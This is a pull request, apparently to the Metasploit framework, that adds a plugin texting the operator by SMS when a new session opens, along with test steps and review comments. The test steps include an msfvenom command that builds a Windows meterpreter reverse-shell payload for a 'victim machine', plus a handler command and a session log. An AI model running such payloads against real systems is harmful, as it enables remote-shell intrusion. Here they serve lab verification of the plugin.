### PR TITLE
Resolve #8026, Add a plugin to notify new sessions via SMS

### LINKED ISSUE #8026: Add a plugin to notify a new session via text
When a session is obtained, it would be nice to notify via text

### PR DESCRIPTION
**Pull request by wchen-r7**
## Description

This plugin will notify you of a new session via SMS. It also changes the SMS text format to MIME.

Resolve #8026 

Kudos to @sho-luv for the suggestion.

## Supported Carriers

* AllTel
* AT&T Wireless
* Boost Mobile
* Cricket Wireless
* Google Fi
* T-Mobile
* Verizon
* Virgin Mobile

## SMTP Setup

Before you verify this PR, you need to set up a valid SMTP server. Since most people have a Gmail account, let's use it as our SMTP server.

- [x] Make sure you are using two-factor authentication
- [x] Make sure you have an application password so the tool can access your Gmail account: https://support.google.com/accounts/answer/185833?hl=en

## Travis Verification

- [x] Make sure Travis is green

## Plugin Verification

First, you will need a payload in order to get a session. This assumes you're on a Windows victim machine:

- [x] Do: ```./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=444 -f exe -o payload.exe```
- [x] Copy ```payload.exe``` to the victim machine

Prepare your session notifier and payload handler:

- [x] Start msfconsole
- [x] ```load session_notifier```
- [x] ```set_session_smtp_from [Your gmail email]```
- [x] ```set_session_smtp_password [Your gmail application password]```
- [x] ```set_session_smtp_port 587```
- [x] ```set_session_smtp_username [Your gmail username]```
- [x] ```set_session_smtp_address smtp.gmail.com```
- [x] ```set_session_mobile_number [Phone number you want to notify]```
- [x] ```set_session_mobile_carrier [Phone carrier]```
- [x] ```start_session_notifier```
- [x] ```handler -p windows/meterpreter/reverse_tcp -H [IP] -P 4444```

Getting a session

- [x] Back to the victim machine, double click on ```payload.exe```
- [x] You should get a session
- [x] Your phone should be notified about the new session

## Using a config file

Saving settings to a config file:

- [x] Start msfconsole
- [x] ```load session_notifier```
- [x] ```set_session_smtp_from [Your gmail email]```
- [x] ```set_session_smtp_password [Your gmail application password]```
- [x] ```set_session_smtp_port 587```
- [x] ```set_session_smtp_username [Your gmail username]```
- [x] ```set_session_smtp_address smtp.gmail.com```
- [x] ```set_session_mobile_number [Phone number you want to notify]```
- [x] ```set_session_mobile_carrier [Phone carrier]```
- [x] ```save_session_notifier_settings```
- [x] Check ```~/.msf4/config```, you should see your SessionNotifier settings there

## Reusing the same settings from the config file

This assumes that you already have a config file that has all the settings needed for Session Notifier:

- [x] Start msfconsole
- [x] ```load session_notifier```
- [x] ```start_session_notifier```
- [x] Get a session
- [x] You phone should receive a notification about the new shell

## Testing auxiliary/client/sms/send_text

Because this PR contains changes that affects auxiliary/client/sms/send_text, we need to retest this. The new change fixes the SMS text format, otherwise certain characters such as ```:``` would cause the text to be either rejected, or blank.

- [x] Save the following RC script (and modify accordingly):

```ruby
use auxiliary/client/sms/send_text
set cellnumbers [Number]
set smscarrier verizon
set smsmessage "test:123"
set smtpaddress smtp.gmail.com
set smtpport 587
set smtpusername [Gmail username]
set smtppassword [Gmail application password]
run

```

- [x] Run msfconsole like this: ```./msfconsole -r [path to RC script]```
- [x] You should get a text with the messsage: ```test:123```

## Demonstration

This shows msfconsole notifying our session via SMS:

```
$ msfconsole
msf > load session_notifier
[*] Session Notifier settings loaded from config file.
[*] Successfully loaded plugin: SessionNotifier
msf > start_session_notifier
[*] Session notification started.
msf > handler -p windows/meterpreter/reverse_tcp -H 192.168.146.1 -P 4444
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.146.1:4444 
msf >
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.146.173
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.173:1440) at 2017-03-13 16:47:08 -0500
[*] Session notified to: XXXXXXXXXX
```

This shows the phone receiving the text message:

screen shot 2017-03-13 at 4 49 11 pm

### CODE REVIEW

**Comment by dmohanty-r7** [comment]
@wchen-r7 In your first step for verifying app password login, I go to your link, go to the "How to generate an App password section"... click on the app passwords link and get sent to a page that says: 
"The setting you are looking for is not available for your account." I created the gmail account in the standard way.

**Comment by wchen-r7** [comment]
It turns out that you must enable two factor authentication in order to allow application passwords. I have updated the PR description to address this. Thanks!

**Comment by h00die** [comment]
if this doesn't get a h0tness tag, then we should drop that tag all together, this is super hotness.

**Comment by dmohanty-r7** [comment]
Sends to my att phone successfully!

```
[*] Meterpreter session 1 opened (*.*.*.*:4444 -> *.*.*.*:58621) at 2017-03-24 10:54:27 -0500
[*] Session notified to: **********
```

**Comment by dmohanty-r7** [comment]
## Release Notes
This PR adds a plugin to send sms notifications once sessions have been created. It works for the following carriers: `AllTel, AT&T Wireless, Boost Mobile, Cricket Wireless, Google Fi, T-Mobile, Verizon, Virgin Mobile`

**Pull request merged**
